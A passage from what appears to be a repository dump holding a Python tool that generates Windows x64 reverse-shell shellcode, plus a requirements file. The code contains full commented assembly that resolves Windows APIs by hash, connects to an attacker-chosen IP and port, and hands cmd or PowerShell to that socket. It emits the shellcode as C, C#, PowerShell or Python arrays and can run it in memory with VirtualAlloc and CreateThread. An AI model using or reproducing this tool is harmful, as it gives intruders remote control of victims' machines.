and counter != 0:\n \t\t\tsc += \"\\n\"\n \t\t\tsc += \"0x{0:02x}\".format(int(dec))+\",\"\n \t\t\tcounter += 1\n\t\tsc=sc[0:len(sc)-1]+\"};\"\n\t\tprint(sc)\t\n\n\n\telif lan==\"powershell\":\n\t\tprint(\"[+]Shellcode format for Powershell\\n\")\n\t\tsc = \"[Byte[]] $\"+var+\" = \"\t\n\t\tfor dec in encoding:\n \t\t\tsc += \"0x{0:02x}\".format(int(dec))+\",\"\n\t\tsc=sc[0:len(sc)-1]\n\t\tprint(sc)\t\n\n\telif lan==\"csharp\":\n\t\tprint(\"[+]Shellcode format for C#\\n\")\n\t\tsc = \"byte[] \" + var + \"= new byte[\"+str(len(encoding))+\"] {\\n\"\t\n\t\tfor dec in encoding:\n \t\t\tif counter % 20 == 0 and counter != 0:\n \t\t\tsc += \"\\n\"\n \t\t\tsc += \"0x{0:02x}\".format(int(dec))+\",\"\n \t\t\tcounter += 1\n\t\tsc=sc[0:len(sc)-1]+\"};\"\n\t\tprint(sc)\t\n\t\n\telse:\n\t\tprint(\"Unsupported language! Exiting...\")\n\t\texit()\n\n\n\tif exec==\"true\":\n\t\tctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64\n\t\tptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),\n ctypes.c_int(len(shellcode)),\n ctypes.c_int(0x3000),\n ctypes.c_int(0x40))\n\n\t\tbuf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)\n\t\tctypes.windll.kernel32.RtlMoveMemory(ctypes.c_uint64(ptr),\n buf,\n ctypes.c_int(len(shellcode)))\n\t\tprint(\"\\n\\nShellcode Executed! Shellcode located at address %s\" % hex(ptr))\n\t\tht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),\n ctypes.c_int(0),\n ctypes.c_uint64(ptr),\n ctypes.c_int(0),\n ctypes.c_int(0),\n ctypes.pointer(ctypes.c_int(0)))\n\n\t\tctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht),ctypes.c_int(-1))\n\n\tif save==\"true\":\n\t\ttry:\n\t\t\twith open(output, 'wb') as f:\n\t\t\t\tf.write(shellcode)\n\t\t\t\tprint(\"\\n\\nGenerated shellcode successfully saved in file \"+output)\n\t\texcept Exception as e:\n\t\t\tprint(e)\n\t\n\t\nif __name__ == \"__main__\":\n\tprint_banner()\n\tparser = argparse.ArgumentParser(description='Dynamically generate Windows x64 reverse shell.')\n\tparser.add_argument('--ip', '-i', required=True, dest='ip',help='The listening IP address, default value is 192.168.0.45')\n\tparser.add_argument('--port', '-p', required=False, default=443, dest='port',help='The local listening port, default value is 443')\n\tparser.add_argument('--language', '-l', required=False, default='python', dest='lan',help='The language of desired shellcode runner, default language is python. Support c, csharp, python, powershell')\n\tparser.add_argument('--variable', '-v', required=False, default='buf', dest='var',help='The variable name of shellcode array, default variable is buf')\n\tparser.add_argument('--type', '-t', required=False, default='cmd', dest='shell_type',help='The shell type, Powershell or Cmd, default shell is cmd')\n\tparser.add_argument('--execution', '-e', required=False, default='False', dest='code_exec',help='Whether to execution generated shellcode? True/False')\n\tparser.add_argument('--save', '-s', required=False, default='False', dest='save',help='Whether to save the generated shellcode to a bin file, True/False')\n\tparser.add_argument('--output', '-o', required=False, default='', dest='output',help='If choose to save the shellcode to file, the desired location.')\n\n\targs = parser.parse_args()\n\tip=args.ip\n\tport=int(args.port)\n\tlan=args.lan.lower()\n\tvar=args.var\n\tshell_type=args.shell_type.lower()\n\tsave=args.save.lower()\n\toutput=args.output\n\tcode_exec=args.code_exec.lower()\n\tprint(\"[+]Shellcode Settings:\")\n\tprint(\"******** IP Address: \"+ip)\n\tprint(\"******** Listening Port: \"+str(port))\n\tprint(\"******** Language of desired shellcode runner: \"+lan)\n\tprint(\"******** Shellcode array variable name: \"+var)\n\tprint(\"******** Shell: \"+shell_type)\n\tprint(\"******** Shellcode Execution: \"+code_exec)\n\tprint(\"******** Save Shellcode to file: \"+save+\"\\n\\n\")\n\n\targs = parser.parse_args()\n\taddress_argument = get_address_argument(ip, port)\n\tshell_type = get_shell_type_argument(shell_type)\n\n\tCODE = (\n\t\t\" mov rbp, rsp;\"\n\t\t\" and spl, 0xf0;\"\n\t\t\" sub rsp, 0x60;\"\n\t\t\" mov qword ptr [rsp+0x10], rbp;\"\n\t\t\" mov rbp, rsp;\"\n\n\t\t\"find_kernel32:\"\n\t\t\" xor rcx, rcx;\"\n\t\t\" mov rax, gs:[rcx+0x60];\" # RAX stores the value of ProcessEnvironmentBlock member in TEB, which is the PEB address\n\t\t\" mov rax, [rax+0x18];\" # Get the value of the LDR member in PEB, which is the address of the _PEB_LDR_DATA structure\n\t\t\" mov rax, [rax+0x30];\" # RAX is the address of the InInitializationOrderModuleList member in the _PEB_LDR_DATA structure\n\t\t\" mov rax, [rax+rcx];\" # Current module is kernelbase.\n\t\t\" mov rax, [rax+rcx];\" # Current module is ntdll.dll\n\t\t\" mov rax, [rax+0x10];\" # Current module is kernel32.dll\n\t\t\" mov qword ptr [rbp+0x48], rax;\" # RAX stores the base address of the module, get the NT header offset\n\t\t\" jmp jump_section;\"\n\n\t\t\"parse_module:\" # Parsing DLL file in memory\n\t\t\" xor r11, r11;\"\n\t\t\" mov r11b, 0x3c;\"\n\t\t\" mov r8d, dword ptr [rcx+r11];\" # RCX stores the base address of the module, get the NT header offset\n\t\t\" add r8, rcx;\"\n\t\t\" add r11b, 0x4c;\"\n\t\t\" mov r8d, dword ptr [r8+r11];\"\n\t\t\" add r8, rcx;\" # Offset to Export Directory\n\t\t\" mov r9d, dword ptr [r8+0x18];\" # R9D stores the number of function names as an index value\n\t\t\" mov r10d, dword ptr [r8+0x20];\" # Get the RVA of ENPT\n\t\t\" add r10, rcx;\" # R10 stores the VMA of ENPT\n\n\t\t\"search_function:\" # Search for a given function\n\t\t\" dec r9;\" # Decrease index by 1\n\t\t\" mov esi, dword ptr [r10+r9*4];\" # RVA of function name string\n\t\t\" add rsi, rcx;\" # RSI points to function name string\n\t\t\" xor rax, rax;\"\n\t\t\" xor r11, r11;\"\n\t\t\" cld;\" # Clear directional flag\n\n\t\t\"function_hashing:\" # Hash function name function\n\t\t\" lodsb;\" # Copy the next byte of RSI to Al\n\t\t\" test al, al;\" # If reaching the end of the string\n\t\t\" jz compare_hash;\" # Compare hash\n\t\t\" ror r11d, 13;\" # Part of hash algorithm\n\t\t\" add r11d, eax;\" # Part of hash algorithm\n\t\t\" jmp function_hashing;\" # Next byte\n\n\t\t\"compare_hash:\"\n\t\t\" cmp edx, r11d;\" # Compare hashes\n\t\t\" jnz search_function;\" # If not equal, search the previous function (index decreases)\n\n\t\t\" return_function:\"\n\t\t\" mov eax, dword ptr [r8+0x24];\" # Ordinal table RVA\n\t\t\" add rax, rcx;\" # Ordinal table VMA\n\t\t\" movzx edx, word ptr [rax+r9*2];\" # Ordinal value -1\n\t\t\" mov eax, dword ptr [r8+0x1c];\" # RVA of EAT\n\t\t\" add rax, rcx;\" # VMA of EAT\n\t\t\" mov eax, dword ptr [rax+rdx*4];\" # RAX stores RVA of the function\n\t\t\" add rax, rcx;\" # RAX stores VMA of the function\n\t\t\" ret;\"\n\n\t\t\"jump_section:\" # Achieve PIC and elminiate 0x00 byte\n\n\t\t\"get_createprocessa:\"\n\t\t\" mov rcx, qword ptr [rbp+0x48];\" # RBP + 0x48 stores base address of Kernel32.dll\n\t\t\" mov edx, 0x16b3fe72;\" # Hash of CreateProcessA\n\t\t\" call parse_module;\" # Get the address of CreateProcessA\n\t\t\" mov qword ptr [rbp+0x18], rax;\" # RBP + 0x20 stores the address of CreateProcessA function\n\n\t\t\"get_loadlibrarya:\"\n\t\t\" mov rcx, qword ptr [rbp+0x48];\" # RBP + 0x48 stores base address of Kernel32.dll\n\t\t\" mov edx, 0xec0e4e8e;\" # Hash of LoadLibraryA\n\t\t\" call parse_module;\" # Get the address of LoadLibraryA\n\t\t\" mov qword ptr [rbp+0x20], rax;\" # RBP + 0X20 stores the address of LoadLibraryA function\n\n\t\t\"load_module:\"\n\t\t\" xor rcx, rcx;\"\n\t\t\" mov cx, 0x6c6c;\" # Save the string \"ll\" to RCX\n\t\t\" push rcx;\" # Push the string to the stack\n\t\t\" mov rcx, 0x642e32335f325357;\" # Save the string \"ws2_32.d\" to RCX\n\t\t\" push rcx;\" # Push the string to the stack\n\t\t\" mov rcx, rsp;\" # RCX points to the \"ws2_32.dll\" string\n\t\t\" sub rsp, 0x20;\" # Function prologue\n\t\t\" call qword ptr [rbp+0x20];\" # LoadLibraryA(\"ws2_32.dll\")\n\t\t\" mov qword ptr [rbp+0x40], rax;\" # RBP + 0x40 stores the base address of ws2_32.dll\n\n\t\t\"get_wsastartup:\"\n\t\t\" mov rcx, qword ptr [rbp+0x40];\" # RBP + 0x40 stores base address of ws2_32.dll\n\t\t\" mov edx, 0x3bfcedcb;\" # Hash of WSAStartup\n\t\t\" call parse_module;\" # Get the address of WSAStartup\n\t\t\" mov qword ptr [rbp+0x28], rax;\" # RBP + 0x28 stores the address of WSAStartup function\n\n\t\t\"get_wsasocketa:\"\n\t\t\" mov rcx, qword ptr [rbp+0x40];\" # RBP + 0x40 stores base address of ws2_32.dll\n\t\t\" mov edx, 0xadf509d9;\" # Hash of WSASocketA\n\t\t\" call parse_module;\" # Get the address of WSASocketA\n\t\t\" mov qword ptr [rbp+0x30], rax;\" # RBP + 0x30 stores the address of WSASocketA function\n\n\t\t\"get_connect:\"\n\t\t\" mov rcx, qword ptr [rbp+0x40];\" # RBP + 0x40 stores base address of ws2_32.dll\n\t\t\" mov edx, 0x60aaf9ec;\" # Hash of connect\n\t\t\" call parse_module;\" # Get the address of connect\n\t\t\" mov qword ptr [rbp+0x38], rax;\" # RBP + 0x38 stores the address of connect function\n\n\t\t\"call_wsastartup:\"\n\t\t\" mov cx, 0x202;\" # Assign 0x202 to wVersionRequired and store it in RCX as the 1st parameter\n\t\t\" sub rsp, 0x7f;\" # Reserve enough space for the lpWSDATA structure\n\t\t\" sub rsp, 0x7f;\"\n\t\t\" sub rsp, 0x62;\"\n\t\t\" mov rdx, rsp;\" # Assign the address of lpWSAData to the RDX register as the 2nd parameter\n\t\t\" call qword ptr [rbp+0x28];\" # RBP + 0x28 stores the address of WSAStartup function\n\t\t\" mov rsp, rbp;\"\n\n\t\t\"call_wsasocketa:\"\n\t\t\" xor rdx, rdx;\"\n\t\t\" xor r8, r8;\"\n\t\t\" xor r9, r9;\" # lpProtocolInfo is 0 as the 4th parameter\n\t\t # dwFlags is 0 as the 6th parameter, stored on the stack\n\t\t\" push rdx;\" # g is 0 as the 5th parameter, stored on the stack\n\t\t\" push rdx;\"\n\t\t\" push rdx;\"\n\t\t\" push rdx;\"\n\t\t\" mov cl, 2;\" # AF is 2 as the 1st parameter\n\t\t\" mov dl, 1;\" # Type is 1 as the 2nd parameter\n\t\t\" mov r8b, 6;\" # Protocol is 6 as the 3rd parameter\n\t\t\" call qword ptr [rbp+0x30];\" # RBP + 0x28 stores the address of WSASocketA function\n\t\t\" mov qword ptr [rsp+0x10], rax;\" # The member STDERROR is the return value of WSASocketA\n\t\t\" mov qword ptr [rsp+0x18], rax;\" # The member STDOUTPUT is the return value of WSASocketA\n\t\t\" mov qword ptr [rsp+0x20], rax;\" # The member STDINPUT is the return value of WSASocketA\n\n\t\t\"call_connect:\"\n\t\t\" mov ecx, eax;\" # Pass the socket descriptor returned by WSASocketA to RCX as the 1st parameter\n\t\t\" mov rax, {};\"\n\t\t\" not rax;\"\n\t\t\" push rax;\" # Pass IP to the corresponding position in the socketaddr structure\n\t\t\" mov rdx, rsp;\" # Pointer to the socketaddr structure as the 2nd parameter\n\t\t\" mov r8b, 0x10;\" # Set namelen member to 0x10\n\t\t\" sub rsp, 0x20;\" # Function epilogue\n\t\t\" call qword ptr [rbp+0x38];\" # RBP + 0x38 stores the address of connect function\n\n\t\t\"call_createprocessa:\"\n\t\t\" xor rcx, rcx;\"\n\t\t\" mov cl, 1;\"\n\t\t\" ror rcx, 0x18;\"\n\t\t\" mov qword ptr [rsp+0x20], rcx;\" # dwFlags=0x100\n\t\t\" mov qword ptr [rsp+0x10], rax;\"\n\t\t\" mov qword ptr [rsp+0x08], rax;\"\n\t\t\" push rax;\"\n\t\t\" push rax;\"\n\t\t\" push 0x68;\" # cb=0x68\n\t\t\" mov r8, rsp;\" # Pointer to STARTINFOA structure\n\t\t\" {};\"\n\t\t\" mov rdx, rsp;\" # Pointer to \"cmd.exe\" is stored in the RCX register\n\t\t\" lea rcx, qword ptr [rsp-0x20];\"\n\t\t\" push rcx;\" # Address of the ProcessInformation structure as the 10th parameter\n\t\t\" push r8;\" # Address of the STARTINFOA structure as the 9th parameter\n\t\t\" push rax;\" # Value of lpCurrentDirectory is 0 as the 8th parameter\n\t\t\" push rax;\" # lpEnvironment=0 as the 7th argument\n\t\t\" xor rcx, rcx;\"\n\t\t\" mov cl, 1;\"\n\t\t\" rol ecx, 27;\"\n\t\t\" push rcx;\" # dwCreationFlags=0 as the 6th argument\n\t\t\" push 1;\" # Value of bInheritHandles is 1 as the 5th parameter\n\t\t\" sub rsp, 0x20;\" # Function epilogue\n\t\t\" mov rcx, rax;\"\n\t\t\" call qword ptr [rbp+0x18];\" # RBP + 0x20 stores the address of CreateProcessA function\n\n\t\t\" mov rsp, qword ptr [rbp+0x10];\"\n\t\t\" ret;\"\n\t).format(address_argument, shell_type)\n\n\tks = Ks(KS_ARCH_X86, KS_MODE_64)\n\tencoding, count = ks.asm(CODE)\n\toutput_shellcode(lan,encoding,var,code_exec,save)\n" }, { "path": "requirements.txt", "content": "keystone\nkeystone-engine\n" } ]